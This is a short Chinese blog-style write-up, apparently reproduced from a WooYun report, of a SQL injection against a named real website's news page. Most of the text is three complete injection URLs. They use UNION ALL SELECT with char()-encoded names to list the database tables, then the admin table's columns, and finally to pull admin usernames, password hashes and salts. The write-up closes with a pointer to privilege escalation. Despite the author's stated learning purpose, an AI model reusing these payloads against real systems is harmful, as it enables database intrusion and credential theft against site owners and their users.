这个漏洞其实是从乌云上找到的,目的主要是学习理解整个过程。主要是学习目的,不搞破坏。。
http://www.waawo.cn/media-news-no-title.php?id=55
数据库基本信息 + 数据库表名
view-source:www.waawo.cn/media-news-no-title.php?id=-55 union all select 111111111111,2,3, ( select GROUP_CONCAT(table_name) from INFORMATION_SCHEMA . tables where TABLE_SCHEMA = concat(char(119),char(97),char(97),char(119),char(111) ) ) ,5,6,7,8,9,10,11,12, concat_ws(0x7c,version(),database(),user()) ,14,15,16 order by 1 desc
数据库管理员表字段
view-source:www.waawo.cn/media-news-no-title.php?id=-55 union all select 111111111111,2,3, (select group_concat(column_name) from information_schema . columns where table_schema = concat(char(119),char(97),char(97),char(119),char(111) ) and table_name = concat( char(101),char(99),char(115),char(95),char(97),char(100),char(109),char(105),char(110),char(95),char(117),char(115),char(101),char(114) ) ) ,5,6,7,8,9,10,11,12, concat_ws(0x7c,version(),database(),user()) ,14,15,16 order by 1 desc
获取管理员表账号密码
view-source:www.waawo.cn/media-news-no-title.php?id=-55 union all select 111111111111,2,3, ( select concat_ws( char(124), group_concat(user_name) , group_concat( password ), group_concat( ec_salt ) ) from waawo . ecs_admin_user ) ,5,6,7,8,9,10,11,12, concat_ws(0x7c,version(),database(),user()) ,14,15,16 order by 1 desc
其实漏洞很简单,开发者没有对传输id参数过滤,导致我们可以union all拼接sql,完成数据库、表名、字段的遍历,其实到最后一步我们已经可以知道这个系统其实是基于ecshop开发的了,到密码这一步就不继续了。点到为止
如果是linux的话,进入之后可以进一步提权操作 https://www.91ri.org/7911.html